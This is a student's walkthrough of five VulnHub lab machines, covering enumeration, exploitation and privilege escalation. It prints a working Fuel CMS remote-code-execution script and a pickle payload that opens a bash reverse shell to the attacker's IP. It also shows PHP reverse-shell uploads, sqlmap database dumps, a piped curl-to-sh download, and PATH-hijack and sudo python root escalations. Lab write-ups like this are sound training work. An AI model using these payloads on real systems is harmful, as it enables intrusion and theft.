# Some vulnhub labs > FullName: Đỗ Xuân Việt. > Student ID: AT160658. -------- I will use Virtualbox/VMware to run vulnhub's machine-vuln env and kali as an attacker machine. # EMPIRE: LUPINONE > Description: > You have to enumerate as much as you can. ## Nmap-identify opened port: The scene after open the vuln machine  This show IP of this machine is `192.168.75.137` (now we know the target IP) Now we scan port with nmap to identify the open ports and running services.  `-sV` for version enumerate, `-p-` for scan all port The result shows that have only 2 opened ports: 80 (http) and 22 (ssh). ## port 80 - web service: I will use `dirb` tool for looking for existing web object (files/folder). It will bruteforce some popular object name for us. ```bash dirb http://192.168.75.137/ ``` then i found a `robots.txt` file > This file used to give instruction to search engine crawlers about locations within the website that robots are allowed, not allowed to crawl and index. > It often used to identify restriced or private areas of a site's content. The information in the file may help attacker to map out the site's content.  But when open this has error 404 on my browser. So, i `ffuf` tool to identify more objects starting with `~`.  Then we found another hint from author  So we need to find ssh private key file then FastTrack dictionary can be used to crack the password of the SSH key. ``` ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.75.137/~secret/.FUZZ' -e .txt, .html ``` The `.` character because u know that this is a hidden file in linux. then we found the url response 200 `http://192.168.75.137/~secret/mysecret.txt` that seem like a ssh key file. It unders form of base-58 encode (by using this [online tool](https://www.dcode.fr/cipher-identifier). We obtained our shh-key after decoding it by cypherchef and save the decoded key into a file. > NOTE: You need add a new line after the ending line of key file (i strunggling for a while to fix that error)😢 > To crack the sshkey: (you can read here to start [here](https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/) to learn about cracking sshkey file) 1. obtain hash value of the ssh-key. 2. crack this hash value. 3. Waiting and hopefully it success.  ## port 22-SSH service: ```bash sudo ssh -i ./ssh_key.txt icex64@192.168.75.137 ``` Then we can obtain the first flag in `user.txt` file Now we ran a few commands to gather information about this machine (OS, kernel version) ```bash uname -a # check kernel version cat /etc/issue # check the OS detail sudo -l # check the sudo perm for current user ``` ```bash icex64@LupinOne:~$ sudo -l Matching Defaults entries for icex64 on LupinOne: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User icex64 may run the following commands on LupinOne: (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py icex64@LupinOne:~$ ls -al /usr/bin/python3.9 /home/arsene/heist.py -rw-r--r-- 1 arsene arsene 118 Oct 4 2021 /home/arsene/heist.py -rwxr-xr-x 1 root root 5479736 Feb 28 2021 /usr/bin/python3.9 ``` We identified a python script owned by another user "arsene", that can run by current user ```python= # cex64@LupinOne:~$ cat /home/arsene/heist.py import webbrowser print ("Its not yet ready to get in action") webbrowser.open("https://empirecybersecurity.co.mz") ``` ## Privilege escalation: To identify files with full perm on target machine ```bash icex64@LupinOne:/home/arsene$ find / -type f -perm -ug=rwx 2>/dev/null /usr/lib/python3.9/webbrowser.py icex64@LupinOne:/home/arsene$ ls -l /usr/lib/python3.9/webbrowser.py -rwxrwxrwx 1 root root 24087 Oct 4 2021 /usr/lib/python3.9/webbrowser.py ``` The file named `webbrowser.py` has write perm, so we can edit it to run any code under user **arsene**. Let's create a rev shell to interactive.  ```bash arsene@LupinOne:~$ sudo -l sudo -l Matching Defaults entries for arsene on LupinOne: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User arsene may run the following commands on LupinOne: (root) NOPASSWD: /usr/bin/pip ``` The **arsene** user can run pip to gain root priv. We use [some command](https://gtfobins.github.io/gtfobins/pip/) to gain root access. # PHINEAS: 1 First, I need to identify the target IP. My attack machine has IP `192.168.183.107/24`, so i scan in IP range `192.168.183.0/24`.  Then discovery this IP by nmap  ```bash= $ sudo nmap -sCV -p22,80,111,3306 192.168.183.108 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 08:14 EDT mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.183.108 Host is up (0.00035s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 acd80aa86a1f786dac068f653eff9c8b (RSA) | 256 e7f8b0071c5b4a4810bcf63642626ce0 (ECDSA) |_ 256 c8f0eab8bf6ba5121f9a91629d1ace75 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-title: Apache HTTP Server Test Page powered by CentOS | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 3306/tcp open mysql MariaDB (unauthorized) MAC Address: 08:00:27:8E:EB:23 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds ``` http and mysql, that is web service. Next step, we enumerate the web directories and files  Nothing interesting, so i will try **structure/robots.txt** ``` User-agent: * Disallow: /fuel/ ``` After some tries, i found this path `/sturcture/index.php/fuel/login` has login page  Searching in [exploitdb](https://www.exploit-db.com/exploits/47138), we found that this service has already has unauthenticated remote code execution vulnerabilities ```python= import requests from urllib.parse import quote import sys from colorama import Fore, Style url = "http://192.168.183.108/structure/index.php" try: r = requests.get(url) if r.status_code == 200: print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL) except requests.ConnectionError: print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL) sys.exit() while True: cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL) main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27" r = requests.get(main_url) output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">') print(output[0]) if cmd == "exit": break ``` We can steal passwd from config dir, that including passwd of user anna  Now, we can ssh to target with user anna. First flag  ## Gain root priv: In web dir, has some .py file. Maybe web service use flask framework. By default, flask run on port 5000, we can confirm that  in web dir has a python file `app.py`. If user send the POST request, parameter ‘awesome’ whose data is loaded by the module pickle. ```python= #!/usr/bin/python3 import pickle import base64 from flask import Flask, request app = Flask(__name__) @app.route("/heaven", methods=["POST"]) def heaven(): data = base64.urlsafe_b64decode(request.form['awesome']) pickle.loads(data) return '', 204 ``` I searched for exploiting the pickle to get RCE. THen use this script to generate code. ```python= # poc3.py import pickle import base64 import os class RCE: def __reduce__(self): cmd = ('bash -i >& /dev/tcp/192.168.183.107/4458 0>&1') return os.system, (cmd,) if __name__ == '__main__': pickled = pickle.dumps(RCE()) print(base64.urlsafe_b64encode(pickled)) ```   # [DARKHOLE: 1](https://www.vulnhub.com/entry/darkhole-1,724/) ## Enum Let's start to find out the target IP by arp-scan. We found it is `192.168.75.138`. Then the running service on our target.  We begin with port 80/http. This websie have Login button. It has signin, signup functionality.  Next step, we enumerate the web directories and files. But nothing intered me. Using burpsuite with this login page. Lets creat a new user When registered as a new user, the request  ## Access admin dashboard: Now, after signin with created user, we can access the dashboard page  After some test, i recognize that each info profile **depended on the id** (update username, email or change password). By this fault, we can change password of abtrary change password of any user. including the user admin (id=1)  Then login as user admin. It has upload function.  ## Exploit upload file: ```bash cp /usr/share/webshells/php/php-reverse-shell.php php_shell.phar ``` I uploaded the file **php_shell.phar** - PHAR (PHP Archive) file. PHP shell will allow us to execute commands on the target machine through the browser. run `nc -lvnp 1234` on attack machine and trigger the rev-shell from upload folder. After getting the shell access, we noticed that it was a limited shell. So, we used a python command for getting stable shell access. ```bash python3 -c 'import pty;pty.spawn("/bin/bash")' ``` ## Root Priv: ```bash www-data@darkhole:/home$ ls -al ls -al total 16 drwxr-xr-x 4 root root 4096 Jul 16 2021 . drwxr-xr-x 20 root root 4096 Jul 15 2021 .. drwxr-xr-x 4 darkhole darkhole 4096 Jul 17 2021 darkhole drwxrwxrwx 5 john john 4096 Jul 17 2021 john ``` Firts, see on the john folder. ```bash www-data@darkhole:/home/john$ ls -al ls -al total 72 drwxrwxrwx 5 john john 4096 Jul 17 2021 . drwxr-xr-x 4 root root 4096 Jul 16 2021 .. -rw------- 1 john john 1722 Jul 17 2021 .bash_history -rw-r--r-- 1 john john 220 Jul 16 2021 .bash_logout -rw-r--r-- 1 john john 3771 Jul 16 2021 .bashrc drwx------ 2 john john 4096 Jul 17 2021 .cache drwxrwxr-x 3 john john 4096 Jul 17 2021 .local -rw------- 1 john john 37 Jul 17 2021 .mysql_history -rw-r--r-- 1 john john 807 Jul 16 2021 .profile drwxrwx--- 2 john www-data 4096 Jul 17 2021 .ssh -rwxrwx--- 1 john john 1 Jul 17 2021 file.py -rwxrwx--- 1 john john 8 Jul 17 2021 password -rwsr-xr-x 1 root root 16784 Jul 17 2021 toto -rw-rw---- 1 john john 24 Jul 17 2021 user.txt www-data@darkhole:/home/john$ ./toto uid=1001(john) gid=33(www-data) groups=33(www-data) ``` We can run the **toto** file, it seem similar to the **id** utility. We supposed that **toto** is just wrap around of **id** command. but run with john priv. So, we make a fake command **id** will run **/bin/bash** when was called. ```bash www-data@darkhole:/home/john$ which id /usr/bin/id www-data@darkhole:/home/john$ echo "/bin/bash" > /tmp/id www-data@darkhole:/home/john$ ls /tmp id www-data@darkhole:/home/john$ cat /tmp/id /bin/bash www-data@darkhole:/home/john$ chmod +x /tmp/id www-data@darkhole:/home/john$ export PATH=/tmp:$PATH www-data@darkhole:/home/john$ which id /tmp/id www-data@darkhole:/home/john$ ./toto ./toto ``` Now, we have john priv ```bash john@darkhole:/home/john$ cat password root123 ```  We found a python file in the user directory that can be run as a root. We can edit this file to our advantage. ```bash john@darkhole:/home/john$ echo "import os; os.system('/bin/bash')" > file.py echo "import os; os.system('/bin/bash')" > file.py john@darkhole:/home/john$ sudo /usr/bin/python3 /home/john/file.py sudo /usr/bin/python3 /home/john/file.py root@darkhole:/home/john# id id uid=0(root) gid=0(root) groups=0(root) ``` # [DARKHOLE: 2](https://www.vulnhub.com/entry/darkhole-2,740/) ## Enum: Let’s start to find out the target IP by arp-scan. We found it is `192.168.75.139`.  Then nmap  The web service on port 80 has Login page. And **.git** folder. (we will get the source latter).  The .git folder contains all the information that is necessary for your project in version control and all the information about commits, remote repository address, etc. All of them are present in this folder. It also contains a log that stores your commit history so that you can roll back to history. Without .git, your project is a local project and not a git project, that means you cannot perform any git operations. We use git-dumper to dump a git repository from a website. ```bash git clone https://github.com/arthaud/git-dumper.git cd git-dumper mkdir backup python3 git_dumper.py http://192.168.75.139/.git/ backup ``` we can see the commit history   We have discovery the email and password to login in burpsuit, we can observe the cookie field has "PHPSESSID=" show that the web use spl ## SQL injection: I will use sqlmap ```bash! sqlmap -u 'http://192.168.75.139/dashboard.php?id=1' --cookie='PHPSESSID=i08vi3mjg3dm9lmqtolp3tofs2' --dbms=mysql --current-db ```  ``` bash sqlmap -u 'http://192.168.75.139/dashboard.php?id=1' --cookie='PHPSESSID=i08vi3mjg3dm9lmqtolp3tofs2' --dbms=mysql --current-db ``` ``` [12:05:49] [INFO] fetching current database current database: 'darkhole_2' [12:05:49] [INFO] fetching tables for database: 'darkhole_2' Database: darkhole_2 [2 tables] +-------+ | ssh | | users | +-------+ ``` ```bash sqlmap -u 'http://192.168.75.139/dashboard.php?id=1' --cookie='PHPSESSID=i08vi3mjg3dm9lmqtolp3tofs2' --dbms=mysql --current-db -D darkhole_2 -T ssh --dump ```  We obtain the user&passwd to ssh ## Root Priv We tried to run the Linpeas script with curl. ```bash curl https://raw.githubusercontent.com/carlospalop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh ```  We saw that a PHP page for the user Losy was available on localhost port 9999. When we see the content of the source code, we see that this allows remote command execution. ```bash jehad@darkhole:~$ cat /opt/web/index.php <?php echo "Parameter GET['cmd']"; if(isset($_GET['cmd'])){ echo system($_GET['cmd']); } ?> ``` using the details of local port forwarding provided in the above results we achieved.   Then, using netcat revshell I listen on port 9001 `nc -nlvp 9001` And generate revshell   From bash history, the password is `gang`   # [PRIME: 1](https://www.vulnhub.com/entry/prime-1,358/) ## Enum: By using arp-scan we obtain the target IP `192.168.75.140`, then use nmap to discovery running services (ssh and http)  ## Port 80 - http:  I has a instruction us how to use WFUZZ tool to enumerate correct parameter for a page  We must find the location.txt, it use with **file** parameter ```bash wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://192.168.75.140/index.php?FUZZ=something ```  `http://192.168.75.140/index.php?file=location.txt`  In result of gobuster before, only 2 php page are `index.php` and `image.php` `http://192.168.75.140/image.php?secrettier360` Next, we try to exploit LFI by executing the following command to extract `/etc/password` file.   Let try this password for wordpress for user `victor` Then we can access the admin page (wp-admin).We try to inject malicious php script ## Wordpress: in plugin tab, the php file cant writeable, so i find other place   Let’s add a [PHP reverse shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php) with my ip-address and chosen port into the file: After bind port and listen on attack machine. We trigger revshell by enter the url ```bash http://192.168.75.140/wordpress/wp-content/themes/twentynineteen/secret.php ``` We need to make this shell fully interactive ```bash python -c 'import pty; pty.spawn("/bin/bash")' ```  ## Root Priv: ### Enum the host: check the OS and kernel version. ```bash www-data@ubuntu:/$ uname -a Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux ```  It seem 450010.c match our conditions. I open http server on my attack machine for transfering poc.c to target machine.